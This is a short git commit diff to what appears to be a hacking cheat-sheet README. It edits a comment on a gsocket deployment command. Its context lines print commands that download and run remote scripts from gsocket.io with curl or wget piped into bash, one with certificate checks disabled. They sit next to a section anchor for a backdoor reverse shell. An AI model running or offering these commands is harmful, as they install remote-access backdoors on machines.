Update README.md

This commit is contained in:
skyper
2023-09-06 12:19:43 +01:00
committed by GitHub
parent 3ff4d1dc20
commit 59261fd516
+1 -1
View File
@@ -1134,7 +1134,7 @@ bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/x)"
or deploy gsocket by running their own deployment server:
```sh
LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/xs)"
LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/xs)" # Notice '/xs' instead of '/x'
```
<a id="backdoor-background-reverse-shell"></a>